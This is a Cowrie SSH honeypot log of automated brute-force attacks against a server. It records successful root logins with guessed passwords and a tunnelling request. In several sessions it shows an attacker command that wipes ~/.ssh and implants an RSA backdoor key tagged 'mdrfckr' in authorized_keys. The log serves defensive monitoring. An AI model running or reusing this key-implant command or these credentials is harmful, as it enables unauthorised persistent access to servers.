{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-28T20:31:09.669685Z","src_ip":"212.227.125.160","session":"2e3e59a22d73"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:31:10.014874Z","src_ip":"212.227.125.160","session":"2e3e59a22d73"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-28T20:31:10.130245Z","session":"2e3e59a22d73"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:32:19.553734Z","src_ip":"212.227.125.160","session":"2e3e59a22d73"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43994,"dst_ip":"1.2.3.4","dst_port":22,"session":"8cbda89517e8","protocol":"ssh","message":"New connection: 212.227.235.229:43994 (1.2.3.4:22) [session: 8cbda89517e8]","sensor":"my-vps","timestamp":"2025-08-28T20:33:46.149373Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:33:46.150187Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:33:46.453068Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.login.success","username":"root","password":"123456@123","message":"login attempt [root/123456@123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:33:47.706114Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:33:48.329695Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:33:48.330395Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:33:48.331533Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:33:48.635884Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:33:49.741460Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T20:33:49.742151Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T20:33:50.048464Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:33:50.049385Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":43998,"dst_ip":"1.2.3.4","dst_port":22,"session":"44f06bc7ae44","protocol":"ssh","message":"New connection: 212.227.235.229:43998 (1.2.3.4:22) [session: 44f06bc7ae44]","sensor":"my-vps","timestamp":"2025-08-28T20:33:50.343165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:33:50.344188Z","src_ip":"212.227.235.229","session":"44f06bc7ae44"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:33:50.639114Z","src_ip":"212.227.235.229","session":"44f06bc7ae44"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T20:33:51.861059Z","src_ip":"212.227.235.229","session":"44f06bc7ae44"}
{"eventid":"cowrie.session.closed","duration":"2.8","message":"Connection lost after 2.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:33:53.159644Z","src_ip":"212.227.235.229","session":"44f06bc7ae44"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":48672,"dst_ip":"1.2.3.4","dst_port":22,"session":"2031d11edae1","protocol":"ssh","message":"New connection: 212.227.235.229:48672 (1.2.3.4:22) [session: 2031d11edae1]","sensor":"my-vps","timestamp":"2025-08-28T20:33:53.451944Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:33:53.452822Z","src_ip":"212.227.235.229","session":"2031d11edae1"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:33:53.746359Z","src_ip":"212.227.235.229","session":"2031d11edae1"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:33:54.961358Z","src_ip":"212.227.235.229","session":"2031d11edae1"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:33:55.256609Z","src_ip":"212.227.235.229","session":"2031d11edae1"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:33:55.257589Z","src_ip":"212.227.235.229","session":"8cbda89517e8"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45480,"dst_ip":"1.2.3.4","dst_port":23,"session":"b2e8b627a525","protocol":"telnet","message":"New connection: 212.227.235.229:45480 (1.2.3.4:23) [session: b2e8b627a525]","sensor":"my-vps","timestamp":"2025-08-28T20:33:58.122568Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60878,"dst_ip":"1.2.3.4","dst_port":22,"session":"3d9b074dcde0","protocol":"ssh","message":"New connection: 212.227.235.229:60878 (1.2.3.4:22) [session: 3d9b074dcde0]","sensor":"my-vps","timestamp":"2025-08-28T20:34:07.974321Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:34:07.975003Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:34:08.237199Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.login.success","username":"root","password":"www.163.com","message":"login attempt [root/www.163.com] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:34:09.326865Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:34:09.878400Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:34:09.879232Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-28T20:34:09.880823Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:10.143936Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T20:34:10.729084Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T20:34:10.729866Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T20:34:10.993757Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:10.994729Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60886,"dst_ip":"1.2.3.4","dst_port":22,"session":"7c61ea33350a","protocol":"ssh","message":"New connection: 212.227.235.229:60886 (1.2.3.4:22) [session: 7c61ea33350a]","sensor":"my-vps","timestamp":"2025-08-28T20:34:11.214457Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:34:11.215412Z","src_ip":"212.227.235.229","session":"7c61ea33350a"}
{"eventid":"cowrie.session.closed","duration":13.183161973953247,"message":"Connection lost after 13 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:11.305658Z","src_ip":"212.227.235.229","session":"b2e8b627a525"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:34:11.443997Z","src_ip":"212.227.235.229","session":"7c61ea33350a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T20:34:12.399974Z","src_ip":"212.227.235.229","session":"7c61ea33350a"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:13.631471Z","src_ip":"212.227.235.229","session":"7c61ea33350a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":60896,"dst_ip":"1.2.3.4","dst_port":22,"session":"05c9b4fad8f5","protocol":"ssh","message":"New connection: 212.227.235.229:60896 (1.2.3.4:22) [session: 05c9b4fad8f5]","sensor":"my-vps","timestamp":"2025-08-28T20:34:13.864594Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T20:34:13.865526Z","src_ip":"212.227.235.229","session":"05c9b4fad8f5"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T20:34:14.100129Z","src_ip":"212.227.235.229","session":"05c9b4fad8f5"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T20:34:15.080287Z","src_ip":"212.227.235.229","session":"05c9b4fad8f5"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:15.316077Z","src_ip":"212.227.235.229","session":"05c9b4fad8f5"}
{"eventid":"cowrie.session.closed","duration":"7.3","message":"Connection lost after 7.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T20:34:15.322952Z","src_ip":"212.227.235.229","session":"3d9b074dcde0"}
